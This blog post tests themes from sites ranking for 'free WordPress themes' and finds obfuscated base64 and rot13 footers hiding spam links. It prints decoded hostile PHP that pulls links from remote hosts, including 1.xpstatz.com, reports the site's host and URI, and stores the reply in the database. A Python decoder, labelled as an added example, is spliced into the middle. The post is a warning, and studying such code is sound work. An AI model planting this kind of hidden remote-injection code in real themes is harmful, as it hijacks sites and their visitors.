Hire a web Developer and Designer to upgrade and boost your online presence with cutting edge Technologies

Saturday, October 27, 2012

Why You Should Never Search For Free WordPress Themes

Now, armed only with the words “free WordPress themes,” builtBackwards’ Theme Authenticity Checker plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe the pages ranking for “Free WordPress Themes” are.
screenshot of google search bar with "Free WordPress Themes"
Note: I am not uploading any of these themes onto my server. Instead I have installed XAMPP and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..
screenshot of google search for "free wordpress themes"

1. WordPressThemesBase

WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.
I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0, and a Pro version was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a knock-off of the Pro version.
First things first – install the theme and run it through TAC.
Screenshot of Branford Magazine TAC
Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:
screenshot branford magazine footer

Yeah, copyright me, damned right! But what is that Base64 hiding? Here it is in the footer code:
screenshot of branford base64
Lots of blah.
You can decode this base64 code in two ways:
  1. You can try Otto’s decoder – handy!
  2. You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.
I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:
screenshot of decoded branford magazine footer
Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.

The Verdict:

I downloaded another 2 themes from this site and they all contained base64 code. Base64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that, but the site, while maintaining that its themes are fresh, is pushing themes built by other designers into which the site owner has inserted base64 code. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!

My suggestion:

Avoid!

2. Free WordPress Themes

Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.
screenshot of beauty store tac
More encrypted code!!!
Here it is in the footer:
screenshot of beauty store footer
For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(
Exploit scanner dislikes it as much as I do:

screenshot of beauty store exploit scanner
All of these came up as severe warnings.

The Verdict

2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64, so I guess that this site is a bit hit and miss. However, with the previous site I could get the code decoded; with this one, no go. A search on some forums for the pieces of code in the footer indicates that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….

My Suggestion

Avoid!

3. Themes2WP

Scanning through the themes on Themes2WP they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso which looks like a nicely designed magazine theme.
screenshot of gameliso tac
Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:
screenshot of gameliso static links
Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:
screenshot of gameliso code
There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.
Oh wait… I did remove them and the site still seems to be working.
There’s another link in sidebar.php. Here it is:
screenshot of gameliso static link
Now to check out the styles for ad_lnk:
screenshot of gameliso css
Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.
So we’ve checked out the links – let’s run exploit scanner.

screenshot of gameliso exploit scanner
Gameliso is picked up as containing an eval() which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.

The Verdict

Nice themes, but they contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well, it could be harmless, but I don’t know enough about JavaScript (probably like many average WordPress users) to tell you whether in this case it is or it isn’t.

My suggestion

Avoid!

4. FreeWPThemes

After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:
screenshot of programme tac
None of these appear at all out of place. So, I felt a bit bad about my assumptions.
However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:
screenshot of programme theme check
Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.

The Verdict

While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor are there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to, but there’s nothing hidden or evil about them!

My suggestion

Okay to use but check to make sure all of the functionality that you need is working.

5. WordPress.org

Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.

screenshot of wordpress.org appearing in Google SERP

The Verdict

A totally trusted and safe place to get your free WordPress themes from.

My suggestion

<3

6. Themes.Rock Kitty

This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:
screenshot of funda tac

More Base64!
This time changing my eval()s to echo()s produced this message:
screenshot of fundo message
The links at the bottom of the theme appear like this:
screenshot of fundo footer links
Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.

The Verdict

Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!

My suggestion

Avoid!

7. WP Themes Depot

Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:
screenshot of niferiti tac
After changing the eval() to an echo() I got this message (again):
screenshot of neferiti message
Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:
screenshot of nefiriti links
It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?
Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.

The Verdict

Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include backlinks, it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.

My suggestion

Avoid!

8. WPRex

I downloaded 5 themes from WPRex: the first two contained static spammy links and the other three contained (surprise surprise) base64.
screenshot of pink desire tac
That’s Pink Desire. This time to decode it I used this decoder.
Here’s what it spat out:
screenshot of pink desire decoded
More encrypted links. People do go to quite some lengths to hide their links!

The Verdict

Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.

My suggestion

Avoid!

9. No Limits Web Design

While this website has a slightly different name from all of the rest, making me hope for something different, upon landing it has the same announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.
screenshot of darknight tac
As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.
I got these results:
screenshot of darknight str
That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:
function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();
I got one of our lovely Incsubbers to take a look at it and he translated it as:
// Fetches link HTML from the first remote host that answers, passing this site's URL along.
function wp_code() {
  $default_link_text = "Default";
  $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
  $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
  $l = "";
  foreach($link_host as $value) {
    if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
      while (!feof ($file)) {
        $line = fgets ($file);
        $l .= $line;
      }
      fclose($file);
      break;
    } else {
      if ($value == end($link_host)) {
        $l=$default_link_text;
      }
    }
  }
  return $l;
}
// On non-admin pages, reads the theme's own sidebar.php and dies depending on a strpos() check against $l.
function check_wp_code_sidebar() {
  $uri = strtolower($_SERVER["REQUEST_URI"]);
  if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
  } else {
    $l="";
    $f = dirname(__file__) . "/sidebar.php";
    $fd = fopen($f, "r");
    $c = fread($fd, filesize($f));
    fclose($fd);
    if (strpos($c, $l) == 0) { die; }
  }
}
check_wp_code_sidebar();
The theme is pulling URLs into the sidebar, and if they don’t appear, it dies. Poor site :(
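As an added example (not code from the original post or from any of the themes it discusses), here is a small Python unwrapper that does the decoding described for the base64 footers above and for the eval(str_rot13( wrapper in Dark Night statically, so none of the theme’s PHP is ever run the way the eval()-to-echo() trick runs it. The sample footer, its two wrapping layers and the spam.example link are constructed for the demonstration.

```python
"""Offline unwrapper for eval(base64_decode(...)) / eval(str_rot13(...)) wrappers in theme
files. Nothing is executed: the literal is decoded in Python and the result only inspected."""
import base64
import binascii
import codecs
import re
import zlib

# PHP decoders commonly wrapped around theme payloads, mapped to pure-Python equivalents.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b, validate=False),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),  # raw DEFLATE stream
}
# eval( <one or more decoder calls> '<literal>' ))...  with a single- or double-quoted literal
EVAL_CHAIN_RE = re.compile(
    r"eval\s*\(\s*((?:(?:base64_decode|str_rot13|gzinflate)\s*\(\s*)+)"
    r"(['\"])(.*?)\2\s*\)+",
    re.DOTALL | re.IGNORECASE,
)
HREF_RE = re.compile(r"""href\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)

def decode_chain(names, literal):
    """Apply the decoders in the order PHP would: the innermost (last named) call first."""
    data = literal.encode("latin-1")
    for name in reversed(names):
        data = DECODERS[name.lower()](data)
    return data.decode("latin-1", errors="replace")

def find_hidden_payloads(php_source, max_depth=8):
    """One finding per eval() wrapper: the decoder layers peeled off, the final payload
    text, and any href targets in it. A payload that is itself another eval() wrapper
    (as in the Dark Night footer's rot13-inside-base64) is unwrapped again, up to max_depth."""
    findings = []
    for match in EVAL_CHAIN_RE.finditer(php_source):
        layers, text = [], match.group(0)
        for _ in range(max_depth):
            inner = EVAL_CHAIN_RE.search(text)
            if not inner:
                break
            names = re.findall(r"[A-Za-z0-9_]+", inner.group(1))
            try:
                text = decode_chain(names, inner.group(3))
            except (binascii.Error, zlib.error, UnicodeDecodeError):
                break  # not a clean literal; report whatever was peeled so far
            layers.append("/".join(n.lower() for n in reversed(names)))
        findings.append({"layers": layers, "payload": text, "links": HREF_RE.findall(text)})
    return findings

# Constructed sample footer.php (not from any real theme): a spam link wrapped in base64,
# then wrapped again in str_rot13 + base64, the way the footers examined above were.
_INNER_PHP = "echo '<a href=\"http://spam.example/av\">Free Anti-Virus Downloads</a>';"
_LAYER1 = "eval(base64_decode('%s'));" % base64.b64encode(_INNER_PHP.encode()).decode()
_LAYER2 = "eval(base64_decode(str_rot13('%s')));" % codecs.encode(
    base64.b64encode(_LAYER1.encode()).decode(), "rot_13")
SAMPLE_FOOTER = "<?php /* copyright me */ %s ?>\n<div id=\"footer\">...</div>" % _LAYER2
```

Running find_hidden_payloads over a downloaded theme’s footer.php and sidebar.php lists every hidden link without ever loading the theme into WordPress.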

Here’s what exploit scanner has to say:

Screenshot of darknight exploit scan

The Verdict

Another site using base64, another one to stay out of the way of. This one is even more encrypted than the others, which ended up showing much more quickly what they are up to.

My suggestion

Avoid!
Phew… getting to the end now… this is exhausting!

10. Templates Browser

Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). Although the TAC only found static links like so:
Screenshot of dropshadow tac
The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some write elements which make me more suspicious. I got my friendly Incsubber to partially decode it:
get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");

if (empty($l_time_code)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
    $new_time_code = 0;
} else
    $new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
    $new_l_code = '
';
} else $new_l_code = $l_code[0];

if ( ( time() - $new_time_code ) >= 60 ) {
    $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
    $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
    $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
    $xps = "xps.";
    $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
    $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

    //1.xpstatz.com/xps.php?h=host&u=uri

    if (ini_get('allow_url_fopen')) {
        $new_l_code = @file_get_contents("http://" . $url . $page);
    }
    else {
        $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);

        if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
            @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
            @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
            $new_l_code = "";
            while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
                $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
            }
            $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
        }
        @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
    }
    if ( strpos($new_l_code, '[/]') ) {
        $new_time_code = time();
        $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
        $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");
        $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
    }

}
if ( strpos($new_l_code, '[/]') ) {
    $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
    $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
    echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
    $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?>
Doesn’t mean a whole lot to me either….
But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.
Basically a much more complex method of doing everything that we’ve seen already.

The Verdict

Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.

My suggestion

Avoid!
Here’s a video from ThemeLab which does what I did, but quicker!

Conclusion

Out of the ten sites on the first page of Google, here are the stats:
  • Safe: 1
  • Iffy: 1
  • Avoid: 8
8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes, but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress for the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.

Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find free WordPress themes.

Free Themes

Premium Sites with some Free WordPress Themes

There are plenty more so look around! Don’t type free WordPress themes into Google though!
Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its URL. WordPress is trademarked, and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (Thanks to Jim – see comments below – for correcting me on that!!!!)

Decoders

If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):

Useful Plugins

Further Reading
